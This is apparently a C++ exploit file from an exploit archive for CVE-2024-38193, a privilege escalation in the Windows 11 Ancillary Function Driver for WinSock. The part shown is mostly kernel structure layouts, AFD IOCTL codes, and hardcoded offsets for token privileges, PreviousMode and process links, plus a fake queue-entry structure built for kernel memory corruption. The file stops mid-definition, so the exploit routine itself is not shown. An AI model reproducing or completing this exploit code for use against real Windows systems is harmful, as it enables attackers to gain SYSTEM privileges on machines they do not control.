
6 changes to exploits/shellcodes/ghdb Apache ActiveMQ 6.1.6 - Denial of Service (DOS) SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation WordPress Depicter Plugin 3.6.1 - SQL Injection Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation VirtualBox 7.0.16 - Privilege Escalation
883 lines
No EOL
24 KiB
C++
883 lines
No EOL
24 KiB
C++
# Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation
|
|
# Date: 2025-05-05
|
|
# Exploit Author: Milad Karimi (Ex3ptionaL)
|
|
# Contact: miladgrayhat@gmail.com
|
|
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
|
|
# Tested on: Win x64
|
|
# CVE : CVE-2024-38193
|
|
|
|
#pragma once
|
|
|
|
#include "ntstatus.h"
|
|
#include "Windows.h"
|
|
#include <iostream>
|
|
|
|
#pragma comment(lib, "ntdll.lib")
|
|
|
|
|
|
#define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF))
|
|
#define LODWORD(l) ((DWORD)((DWORDLONG)(l)))
|
|
|
|
#define AfdOpenPacket "AfdOpenPacketXX"
|
|
#define AFD_DEVICE_NAME L"\\Device\\Afd"
|
|
#define LOCALHOST "127.0.0.1"
|
|
|
|
|
|
#define IOCTL_AFD_BIND 0x12003LL
|
|
#define IOCTL_AFD_LISTEN 0x1200BLL
|
|
#define IOCTL_AFD_CONNECT 0x120BBLL
|
|
#define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL
|
|
#define FSCTL_PIPE_PEEK 0x11400CLL
|
|
#define FSCTL_PIPE_IMPERSONATE 0x11001CLL
|
|
#define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8
|
|
|
|
#define OBJ_CASE_INSENSITIVE 0x00000040
|
|
#define OBJ_INHERIT 0x00000002
|
|
#define FILE_OPEN_IF 0x3
|
|
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
|
|
|
|
#define OFFSET_IN_TOKEN_VARIABLEPART 0x490
|
|
#define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40
|
|
#define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8
|
|
#define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0
|
|
#define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8
|
|
#define PREVIOUS_MODE_OFFSET 0x232
|
|
#define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448
|
|
#define OFFSET_TO_TOKEN 0x4b8
|
|
#define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE
|
|
|
|
|
|
typedef struct IO_STATUS_BLOCK
|
|
{
|
|
union
|
|
{
|
|
DWORD Status;
|
|
PVOID Pointer;
|
|
};
|
|
|
|
DWORD* Information;
|
|
};
|
|
|
|
//0x4 bytes (sizeof)
|
|
struct _SYSTEM_POWER_STATE_CONTEXT
|
|
{
|
|
union
|
|
{
|
|
struct
|
|
{
|
|
ULONG Reserved1 : 8; //0x0
|
|
ULONG TargetSystemState : 4; //0x0
|
|
ULONG EffectiveSystemState : 4; //0x0
|
|
ULONG CurrentSystemState : 4; //0x0
|
|
ULONG IgnoreHibernationPath : 1; //0x0
|
|
ULONG PseudoTransition : 1; //0x0
|
|
ULONG KernelSoftReboot : 1; //0x0
|
|
ULONG DirectedDripsTransition : 1; //0x0
|
|
ULONG Reserved2 : 8; //0x0
|
|
};
|
|
ULONG ContextAsUlong; //0x0
|
|
};
|
|
};
|
|
|
|
//0x4 bytes (sizeof)
|
|
union _POWER_STATE
|
|
{
|
|
enum _SYSTEM_POWER_STATE SystemState; //0x0
|
|
enum _DEVICE_POWER_STATE DeviceState; //0x0
|
|
};
|
|
|
|
//0x48 bytes (sizeof)
|
|
typedef struct _IO_STACK_LOCATION
|
|
{
|
|
UCHAR MajorFunction; //0x0
|
|
UCHAR MinorFunction; //0x1
|
|
UCHAR Flags; //0x2
|
|
UCHAR Control; //0x3
|
|
union
|
|
{
|
|
struct
|
|
{
|
|
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
|
|
ULONG Options; //0x10
|
|
USHORT FileAttributes; //0x18
|
|
USHORT ShareAccess; //0x1a
|
|
ULONG EaLength; //0x20
|
|
} Create; //0x8
|
|
struct
|
|
{
|
|
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
|
|
ULONG Options; //0x10
|
|
USHORT Reserved; //0x18
|
|
USHORT ShareAccess; //0x1a
|
|
struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20
|
|
} CreatePipe; //0x8
|
|
struct
|
|
{
|
|
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
|
|
ULONG Options; //0x10
|
|
USHORT Reserved; //0x18
|
|
USHORT ShareAccess; //0x1a
|
|
struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20
|
|
} CreateMailslot; //0x8
|
|
struct
|
|
{
|
|
ULONG Length; //0x8
|
|
ULONG Key; //0x10
|
|
ULONG Flags; //0x14
|
|
union _LARGE_INTEGER ByteOffset; //0x18
|
|
} Read; //0x8
|
|
struct
|
|
{
|
|
ULONG Length; //0x8
|
|
ULONG Key; //0x10
|
|
ULONG Flags; //0x14
|
|
union _LARGE_INTEGER ByteOffset; //0x18
|
|
} Write; //0x8
|
|
struct
|
|
{
|
|
ULONG Length; //0x8
|
|
struct _UNICODE_STRING* FileName; //0x10
|
|
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18
|
|
ULONG FileIndex; //0x20
|
|
} QueryDirectory; //0x8
|
|
struct
|
|
{
|
|
ULONG Length; //0x8
|
|
ULONG CompletionFilter; //0x10
|
|
} NotifyDirectory; //0x8
|
|
struct
|
|
{
|
|
ULONG Length; //0x8
|
|
ULONG CompletionFilter; //0x10
|
|
enum _DIRECTORY_NOTIFY_INFORMATION_CLASS
|
|
DirectoryNotifyInformationClass; //0x18
|
|
} NotifyDirectoryEx; //0x8
|
|
struct
|
|
{
|
|
ULONG Length; //0x8
|
|
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
|
|
} QueryFile; //0x8
|
|
struct
|
|
{
|
|
ULONG Length; //0x8
|
|
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
|
|
struct _FILE_OBJECT* FileObject; //0x18
|
|
union
|
|
{
|
|
struct
|
|
{
|
|
UCHAR ReplaceIfExists; //0x20
|
|
UCHAR AdvanceOnly; //0x21
|
|
};
|
|
ULONG ClusterCount; //0x20
|
|
VOID* DeleteHandle; //0x20
|
|
};
|
|
} SetFile; //0x8
|
|
struct
|
|
{
|
|
ULONG Length; //0x8
|
|
VOID* EaList; //0x10
|
|
ULONG EaListLength; //0x18
|
|
ULONG EaIndex; //0x20
|
|
} QueryEa; //0x8
|
|
struct
|
|
{
|
|
ULONG Length; //0x8
|
|
} SetEa; //0x8
|
|
struct
|
|
{
|
|
ULONG Length; //0x8
|
|
enum _FSINFOCLASS FsInformationClass; //0x10
|
|
} QueryVolume; //0x8
|
|
struct
|
|
{
|
|
ULONG Length; //0x8
|
|
enum _FSINFOCLASS FsInformationClass; //0x10
|
|
} SetVolume; //0x8
|
|
struct
|
|
{
|
|
ULONG OutputBufferLength; //0x8
|
|
ULONG InputBufferLength; //0x10
|
|
ULONG FsControlCode; //0x18
|
|
VOID* Type3InputBuffer; //0x20
|
|
} FileSystemControl; //0x8
|
|
struct
|
|
{
|
|
union _LARGE_INTEGER* Length; //0x8
|
|
ULONG Key; //0x10
|
|
union _LARGE_INTEGER ByteOffset; //0x18
|
|
} LockControl; //0x8
|
|
struct
|
|
{
|
|
ULONG OutputBufferLength; //0x8
|
|
ULONG InputBufferLength; //0x10
|
|
ULONG IoControlCode; //0x18
|
|
VOID* Type3InputBuffer; //0x20
|
|
} DeviceIoControl; //0x8
|
|
struct
|
|
{
|
|
ULONG SecurityInformation; //0x8
|
|
ULONG Length; //0x10
|
|
} QuerySecurity; //0x8
|
|
struct
|
|
{
|
|
ULONG SecurityInformation; //0x8
|
|
VOID* SecurityDescriptor; //0x10
|
|
} SetSecurity; //0x8
|
|
struct
|
|
{
|
|
struct _VPB* Vpb; //0x8
|
|
struct _DEVICE_OBJECT* DeviceObject; //0x10
|
|
} MountVolume; //0x8
|
|
struct
|
|
{
|
|
struct _VPB* Vpb; //0x8
|
|
struct _DEVICE_OBJECT* DeviceObject; //0x10
|
|
} VerifyVolume; //0x8
|
|
struct
|
|
{
|
|
struct _SCSI_REQUEST_BLOCK* Srb; //0x8
|
|
} Scsi; //0x8
|
|
struct
|
|
{
|
|
ULONG Length; //0x8
|
|
VOID* StartSid; //0x10
|
|
struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18
|
|
ULONG SidListLength; //0x20
|
|
} QueryQuota; //0x8
|
|
struct
|
|
{
|
|
ULONG Length; //0x8
|
|
} SetQuota; //0x8
|
|
struct
|
|
{
|
|
enum _DEVICE_RELATION_TYPE Type; //0x8
|
|
} QueryDeviceRelations; //0x8
|
|
struct
|
|
{
|
|
struct _GUID* InterfaceType; //0x8
|
|
USHORT Size; //0x10
|
|
USHORT Version; //0x12
|
|
struct _INTERFACE* Interface; //0x18
|
|
VOID* InterfaceSpecificData; //0x20
|
|
} QueryInterface; //0x8
|
|
struct
|
|
{
|
|
struct _DEVICE_CAPABILITIES* Capabilities; //0x8
|
|
} DeviceCapabilities; //0x8
|
|
struct
|
|
{
|
|
struct _IO_RESOURCE_REQUIREMENTS_LIST*
|
|
IoResourceRequirementList; //0x8
|
|
} FilterResourceRequirements; //0x8
|
|
struct
|
|
{
|
|
ULONG WhichSpace; //0x8
|
|
VOID* Buffer; //0x10
|
|
ULONG Offset; //0x18
|
|
ULONG Length; //0x20
|
|
} ReadWriteConfig; //0x8
|
|
struct
|
|
{
|
|
UCHAR Lock; //0x8
|
|
} SetLock; //0x8
|
|
struct
|
|
{
|
|
enum BUS_QUERY_ID_TYPE IdType; //0x8
|
|
} QueryId; //0x8
|
|
struct
|
|
{
|
|
enum DEVICE_TEXT_TYPE DeviceTextType; //0x8
|
|
ULONG LocaleId; //0x10
|
|
} QueryDeviceText; //0x8
|
|
struct
|
|
{
|
|
UCHAR InPath; //0x8
|
|
UCHAR Reserved[3]; //0x9
|
|
enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10
|
|
} UsageNotification; //0x8
|
|
struct
|
|
{
|
|
enum _SYSTEM_POWER_STATE PowerState; //0x8
|
|
} WaitWake; //0x8
|
|
struct
|
|
{
|
|
struct _POWER_SEQUENCE* PowerSequence; //0x8
|
|
} PowerSequence; //0x8
|
|
struct
|
|
{
|
|
union
|
|
{
|
|
ULONG SystemContext; //0x8
|
|
struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext;
|
|
//0x8
|
|
};
|
|
enum _POWER_STATE_TYPE Type; //0x10
|
|
union _POWER_STATE State; //0x18
|
|
enum POWER_ACTION ShutdownType; //0x20
|
|
} Power; //0x8
|
|
struct
|
|
{
|
|
struct _CM_RESOURCE_LIST* AllocatedResources; //0x8
|
|
struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10
|
|
} StartDevice; //0x8
|
|
struct
|
|
{
|
|
ULONGLONG ProviderId; //0x8
|
|
VOID* DataPath; //0x10
|
|
ULONG BufferSize; //0x18
|
|
VOID* Buffer; //0x20
|
|
} WMI; //0x8
|
|
struct
|
|
{
|
|
VOID* Argument1; //0x8
|
|
VOID* Argument2; //0x10
|
|
VOID* Argument3; //0x18
|
|
VOID* Argument4; //0x20
|
|
} Others; //0x8
|
|
} Parameters; //0x8
|
|
struct _DEVICE_OBJECT* DeviceObject; //0x28
|
|
struct _FILE_OBJECT* FileObject; //0x30
|
|
LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP*
|
|
arg2, VOID* arg3); //0x38
|
|
VOID* Context; //0x40
|
|
}IO_STACK_LOCATION;
|
|
|
|
//0x18 bytes (sizeof)
|
|
struct _KDEVICE_QUEUE_ENTRY
|
|
{
|
|
struct _LIST_ENTRY DeviceListEntry; //0x0
|
|
ULONG SortKey; //0x10
|
|
UCHAR Inserted; //0x14
|
|
};
|
|
|
|
//0x58 bytes (sizeof)
|
|
struct _KAPC
|
|
{
|
|
UCHAR Type; //0x0
|
|
UCHAR AllFlags; //0x1
|
|
UCHAR Size; //0x2
|
|
UCHAR SpareByte1; //0x3
|
|
ULONG SpareLong0; //0x4
|
|
struct _KTHREAD* Thread; //0x8
|
|
struct _LIST_ENTRY ApcListEntry; //0x10
|
|
VOID* Reserved[3]; //0x20
|
|
VOID* NormalContext; //0x38
|
|
VOID* SystemArgument1; //0x40
|
|
VOID* SystemArgument2; //0x48
|
|
CHAR ApcStateIndex; //0x50
|
|
CHAR ApcMode; //0x51
|
|
UCHAR Inserted; //0x52
|
|
};
|
|
//0xd0 bytes (sizeof)
|
|
struct _IRP
|
|
{
|
|
SHORT Type; //0x0
|
|
USHORT Size; //0x2
|
|
USHORT AllocationProcessorNumber; //0x4
|
|
USHORT Reserved; //0x6
|
|
struct _MDL* MdlAddress; //0x8
|
|
ULONG Flags; //0x10
|
|
union
|
|
{
|
|
struct _IRP* MasterIrp; //0x18
|
|
LONG IrpCount; //0x18
|
|
VOID* SystemBuffer; //0x18
|
|
} AssociatedIrp; //0x18
|
|
struct _LIST_ENTRY ThreadListEntry; //0x20
|
|
struct IO_STATUS_BLOCK IoStatus; //0x30
|
|
CHAR RequestorMode; //0x40
|
|
UCHAR PendingReturned; //0x41
|
|
CHAR StackCount; //0x42
|
|
CHAR CurrentLocation; //0x43
|
|
UCHAR Cancel; //0x44
|
|
UCHAR CancelIrql; //0x45
|
|
CHAR ApcEnvironment; //0x46
|
|
UCHAR AllocationFlags; //0x47
|
|
union
|
|
{
|
|
struct _IO_STATUS_BLOCK* UserIosb; //0x48
|
|
VOID* IoRingContext; //0x48
|
|
};
|
|
struct _KEVENT* UserEvent; //0x50
|
|
union
|
|
{
|
|
struct
|
|
{
|
|
union
|
|
{
|
|
VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK*
|
|
arg2, ULONG arg3); //0x58
|
|
VOID* IssuingProcess; //0x58
|
|
};
|
|
union
|
|
{
|
|
VOID* UserApcContext; //0x60
|
|
struct _IORING_OBJECT* IoRing; //0x60
|
|
};
|
|
} AsynchronousParameters; //0x58
|
|
union _LARGE_INTEGER AllocationSize; //0x58
|
|
} Overlay; //0x58
|
|
VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);
|
|
//0x68
|
|
VOID* UserBuffer; //0x70
|
|
union
|
|
{
|
|
struct
|
|
{
|
|
union
|
|
{
|
|
struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78
|
|
VOID* DriverContext[4]; //0x78
|
|
};
|
|
struct _ETHREAD* Thread; //0x98
|
|
CHAR* AuxiliaryBuffer; //0xa0
|
|
struct _LIST_ENTRY ListEntry; //0xa8
|
|
union
|
|
{
|
|
struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8
|
|
ULONG PacketType; //0xb8
|
|
};
|
|
struct _FILE_OBJECT* OriginalFileObject; //0xc0
|
|
VOID* IrpExtension; //0xc8
|
|
} Overlay; //0x78
|
|
struct _KAPC Apc; //0x78
|
|
VOID* CompletionKey; //0x78
|
|
} Tail; //0x78
|
|
};
|
|
typedef struct _TA_ADDRESS
|
|
{
|
|
USHORT AddressLength;
|
|
USHORT AddressType;
|
|
UCHAR Address[1];
|
|
}TA_ADDRESS;
|
|
|
|
typedef struct _TRANSPORT_ADDRESS
|
|
{
|
|
LONG TAAddressCount;
|
|
TA_ADDRESS Address[1];
|
|
}TRANSPORT_ADDRESS;
|
|
|
|
typedef struct _UNICODE_STRING {
|
|
USHORT Length;
|
|
USHORT MaximumLength;
|
|
PWSTR Buffer;
|
|
} UNICODE_STRING, * PUNICODE_STRING;
|
|
|
|
typedef struct _OBJECT_ATTRIBUTES
|
|
{
|
|
ULONG Length;
|
|
HANDLE RootDirectory;
|
|
PUNICODE_STRING ObjectName;
|
|
ULONG Attributes;
|
|
PVOID SecurityDescriptor;
|
|
PVOID SecurityQualityOfService;
|
|
}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
|
|
|
|
typedef struct _SYSTEM_MODULE_ENTRY
|
|
{
|
|
HANDLE Section;
|
|
PVOID MappedBase;
|
|
PVOID ImageBase;
|
|
ULONG ImageSize;
|
|
ULONG Flags;
|
|
USHORT LoadOrderIndex;
|
|
USHORT InitOrderIndex;
|
|
USHORT LoadCount;
|
|
USHORT OffsetToFileName;
|
|
UCHAR FullPathName[256];
|
|
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;
|
|
|
|
typedef struct _SYSTEM_MODULE_INFORMATION
|
|
{
|
|
ULONG Count;
|
|
SYSTEM_MODULE_ENTRY Module[1];
|
|
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
|
|
|
|
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
|
|
{
|
|
PVOID Object;
|
|
ULONG_PTR UniqueProcessId;
|
|
ULONG_PTR HandleValue;
|
|
ULONG GrantedAccess;
|
|
USHORT CreatorBackTraceIndex;
|
|
USHORT ObjectTypeIndex;
|
|
ULONG HandleAttributes;
|
|
ULONG Reserved;
|
|
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
|
|
|
|
typedef struct _SYSTEM_HANDLE_INFORMATION_EX
|
|
{
|
|
ULONG_PTR NumberOfHandles;
|
|
ULONG_PTR Reserved;
|
|
SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
|
|
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
|
|
|
|
typedef struct _AFD_CREATE_PACKET {
|
|
//FILE_FULL_EA_INFORMATION
|
|
ULONG NextEntryOffset;
|
|
WORD Flags;
|
|
UCHAR EaNameLength;
|
|
USHORT EaValueLength;
|
|
CHAR EaName[15];
|
|
|
|
//AFD_CREATE_PACKET
|
|
ULONG EndpointFlags;
|
|
ULONG GroupID;
|
|
ULONG AddressFamily;
|
|
ULONG SocketType;
|
|
ULONG Protocol;
|
|
ULONG SizeOfTransportName;
|
|
wchar_t TransportName[16];
|
|
//UCHAR Unkown;
|
|
} AFD_CREATE_PACKET;
|
|
|
|
enum THREADINFOCLASS { ThreadImpersonationToken = 5 };
|
|
|
|
enum SYSTEM_INFORMATION_CLASS {
|
|
SystemModuleInformation = 11,
|
|
SystemExtendedHandleInformation = 64
|
|
};
|
|
|
|
typedef enum EVENT_TYPE {
|
|
NotificationEvent,
|
|
SynchronizationEvent
|
|
};
|
|
|
|
typedef struct _AFD_BIND_DATA {
|
|
ULONG ShareType;
|
|
SOCKADDR_IN addr;
|
|
} AFD_BIND_DATA, * PAFD_BIND_DATA;
|
|
|
|
typedef struct alignas(16) MY_AFD_CONNECT_INFO
|
|
{
|
|
__int64 UseSan;
|
|
__int64 hNtSock1;
|
|
__int64 Unknown;
|
|
__int32 tmp6;
|
|
WORD const_16;
|
|
sockaddr_in bind;
|
|
};
|
|
|
|
|
|
typedef struct FAKE_DATA_ENTRY_QUEUE
|
|
{
|
|
DWORD tmp;
|
|
LIST_ENTRY nextQueue;
|
|
__int64 unknown;
|
|
PVOID security_client_context;
|
|
__int64 unknown2;
|
|
__int64 sizeOfData;
|
|
char DATA[0x77FD0];
|
|
};
|
|
|
|
typedef struct _AFD_LISTEN_INFO {
|
|
|
|
ULONG unknown;
|
|
__int64 MaximumConnectionQueue;
|
|
} AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
typedef struct _SECURITY_CLIENT_CONTEXT
|
|
{
|
|
_SECURITY_QUALITY_OF_SERVICE SecurityQos;
|
|
void* ClientToken;
|
|
unsigned __int8 DirectlyAccessClientToken;
|
|
unsigned __int8 DirectAccessEffectiveOnly;
|
|
unsigned __int8 ServerIsRemote;
|
|
_TOKEN_CONTROL ClientTokenControl;
|
|
}SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;
|
|
|
|
struct __declspec(align(8)) _OWNER_ENTRY
|
|
{
|
|
unsigned __int64 OwnerThread;
|
|
DWORD ___u1;
|
|
};
|
|
|
|
|
|
//0x68 bytes (sizeof)
|
|
typedef struct _ERESOURCE
|
|
{
|
|
struct _LIST_ENTRY SystemResourcesList; //0x0
|
|
struct _OWNER_ENTRY* OwnerTable; //0x10
|
|
SHORT ActiveCount; //0x18
|
|
union
|
|
{
|
|
USHORT Flag; //0x1a
|
|
struct
|
|
{
|
|
UCHAR ReservedLowFlags; //0x1a
|
|
UCHAR WaiterPriority; //0x1b
|
|
};
|
|
};
|
|
VOID* SharedWaiters; //0x20
|
|
VOID* ExclusiveWaiters; //0x28
|
|
struct _OWNER_ENTRY OwnerEntry; //0x30
|
|
ULONG ActiveEntries; //0x40
|
|
ULONG ContentionCount; //0x44
|
|
ULONG NumberOfSharedWaiters; //0x48
|
|
ULONG NumberOfExclusiveWaiters; //0x4c
|
|
VOID* Reserved2; //0x50
|
|
union
|
|
{
|
|
VOID* Address; //0x58
|
|
ULONGLONG CreatorBackTraceIndex; //0x58
|
|
};
|
|
ULONGLONG SpinLock; //0x60
|
|
}ERESOURCE, *PERESOURCE;
|
|
|
|
//0x8 bytes (sizeof)
|
|
typedef struct _EX_PUSH_LOCK
|
|
{
|
|
union
|
|
{
|
|
struct
|
|
{
|
|
ULONGLONG Locked : 1; //0x0
|
|
ULONGLONG Waiting : 1; //0x0
|
|
ULONGLONG Waking : 1; //0x0
|
|
ULONGLONG MultipleShared : 1; //0x0
|
|
ULONGLONG Shared : 60; //0x0
|
|
};
|
|
ULONGLONG Value; //0x0
|
|
VOID* Ptr; //0x0
|
|
};
|
|
};
|
|
|
|
//0x10 bytes (sizeof)
|
|
typedef struct _SEP_CACHED_HANDLES_TABLE
|
|
{
|
|
struct _EX_PUSH_LOCK Lock; //0x0
|
|
struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8
|
|
};
|
|
|
|
//0x8 bytes (sizeof)
|
|
typedef struct _EX_RUNDOWN_REF
|
|
{
|
|
union
|
|
{
|
|
ULONGLONG Count; //0x0
|
|
VOID* Ptr; //0x0
|
|
};
|
|
};
|
|
|
|
//0x20 bytes (sizeof)
|
|
typedef struct _OB_HANDLE_REVOCATION_BLOCK
|
|
{
|
|
struct _LIST_ENTRY RevocationInfos; //0x0
|
|
struct _EX_PUSH_LOCK Lock; //0x10
|
|
struct _EX_RUNDOWN_REF Rundown; //0x18
|
|
};
|
|
|
|
//0xc0 bytes (sizeof)
|
|
typedef struct _SEP_LOGON_SESSION_REFERENCES
|
|
{
|
|
struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0
|
|
struct _LUID LogonId; //0x8
|
|
struct _LUID BuddyLogonId; //0x10
|
|
LONGLONG ReferenceCount; //0x18
|
|
ULONG Flags; //0x20
|
|
struct _DEVICE_MAP* pDeviceMap; //0x28
|
|
VOID* Token; //0x30
|
|
struct _UNICODE_STRING AccountName; //0x38
|
|
struct _UNICODE_STRING AuthorityName; //0x48
|
|
struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58
|
|
struct _EX_PUSH_LOCK SharedDataLock; //0x68
|
|
struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes;
|
|
//0x70
|
|
struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78
|
|
struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80
|
|
struct _EJOB* ServerSilo; //0xa0
|
|
struct _LUID SiblingAuthId; //0xa8
|
|
struct _LIST_ENTRY TokenList; //0xb0
|
|
};
|
|
//0x30 bytes (sizeof)
|
|
typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
|
|
{
|
|
ULONG SecurityAttributeCount; //0x0
|
|
struct _LIST_ENTRY SecurityAttributesList; //0x8
|
|
ULONG WorkingSecurityAttributeCount; //0x18
|
|
struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20
|
|
}AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;
|
|
|
|
//0x20 bytes (sizeof)
|
|
typedef struct _SEP_SID_VALUES_BLOCK
|
|
{
|
|
ULONG BlockLength; //0x0
|
|
LONGLONG ReferenceCount; //0x8
|
|
ULONG SidCount; //0x10
|
|
ULONGLONG SidValuesStart; //0x18
|
|
}SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;
|
|
|
|
//0x18 bytes (sizeof)
|
|
struct _SEP_TOKEN_PRIVILEGES
|
|
{
|
|
ULONGLONG Present; //0x0
|
|
ULONGLONG Enabled; //0x8
|
|
ULONGLONG EnabledByDefault; //0x10
|
|
};
|
|
|
|
//0x1f bytes (sizeof)
|
|
struct _SEP_AUDIT_POLICY
|
|
{
|
|
struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0
|
|
UCHAR PolicySetStatus; //0x1e
|
|
};
|
|
|
|
//0x498 bytes (sizeof)
|
|
struct _TOKEN
|
|
{
|
|
struct _TOKEN_SOURCE TokenSource; //0x0
|
|
struct _LUID TokenId; //0x10
|
|
struct _LUID AuthenticationId; //0x18
|
|
struct _LUID ParentTokenId; //0x20
|
|
union _LARGE_INTEGER ExpirationTime; //0x28
|
|
struct _ERESOURCE* TokenLock; //0x30
|
|
struct _LUID ModifiedId; //0x38
|
|
struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40
|
|
struct _SEP_AUDIT_POLICY AuditPolicy; //0x58
|
|
ULONG SessionId; //0x78
|
|
ULONG UserAndGroupCount; //0x7c
|
|
ULONG RestrictedSidCount; //0x80
|
|
ULONG VariableLength; //0x84
|
|
ULONG DynamicCharged; //0x88
|
|
ULONG DynamicAvailable; //0x8c
|
|
ULONG DefaultOwnerIndex; //0x90
|
|
struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98
|
|
struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0
|
|
VOID* PrimaryGroup; //0xa8
|
|
ULONG* DynamicPart; //0xb0
|
|
struct _ACL* DefaultDacl; //0xb8
|
|
enum _TOKEN_TYPE TokenType; //0xc0
|
|
enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4
|
|
ULONG TokenFlags; //0xc8
|
|
UCHAR TokenInUse; //0xcc
|
|
ULONG IntegrityLevelIndex; //0xd0
|
|
ULONG MandatoryPolicy; //0xd4
|
|
void* LogonSession; //0xd8
|
|
struct _LUID OriginatingLogonSession; //0xe0
|
|
struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8
|
|
struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8
|
|
struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION*
|
|
pSecurityAttributes; //0x308
|
|
VOID* Package; //0x310
|
|
struct _SID_AND_ATTRIBUTES* Capabilities; //0x318
|
|
ULONG CapabilityCount; //0x320
|
|
struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328
|
|
struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438
|
|
struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440
|
|
struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes;
|
|
//0x448
|
|
VOID* TrustLevelSid; //0x450
|
|
struct _TOKEN* TrustLinkedToken; //0x458
|
|
VOID* IntegrityLevelSidValue; //0x460
|
|
struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468
|
|
struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470
|
|
struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478
|
|
struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480
|
|
VOID* SessionObject; //0x488
|
|
ULONGLONG VariablePart; //0x490
|
|
};
|
|
|
|
//0x38 bytes (sizeof)
|
|
struct _OBJECT_HEADER
|
|
{
|
|
LONGLONG PointerCount; //0x0
|
|
union
|
|
{
|
|
LONGLONG HandleCount; //0x8
|
|
VOID* NextToFree; //0x8
|
|
};
|
|
struct _EX_PUSH_LOCK Lock; //0x10
|
|
UCHAR TypeIndex; //0x18
|
|
union
|
|
{
|
|
UCHAR TraceFlags; //0x19
|
|
struct
|
|
{
|
|
UCHAR DbgRefTrace : 1; //0x19
|
|
UCHAR DbgTracePermanent : 1; //0x19
|
|
};
|
|
};
|
|
UCHAR InfoMask; //0x1a
|
|
union
|
|
{
|
|
UCHAR Flags; //0x1b
|
|
struct
|
|
{
|
|
UCHAR NewObject : 1; //0x1b
|
|
UCHAR KernelObject : 1; //0x1b
|
|
UCHAR KernelOnlyAccess : 1; //0x1b
|
|
UCHAR ExclusiveObject : 1; //0x1b
|
|
UCHAR PermanentObject : 1; //0x1b
|
|
UCHAR DefaultSecurityQuota : 1; //0x1b
|
|
UCHAR SingleHandleEntry : 1; //0x1b
|
|
UCHAR DeletedInline : 1; //0x1b
|
|
};
|
|
};
|
|
ULONG Reserved; //0x1c
|
|
union
|
|
{
|
|
struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20
|
|
VOID* QuotaBlockCharged; //0x20
|
|
};
|
|
VOID* SecurityDescriptor; //0x28
|
|
struct _TOKEN Body; //0x30
|
|
};
|
|
|
|
struct mm {
|
|
void* fake_data_entry;
|
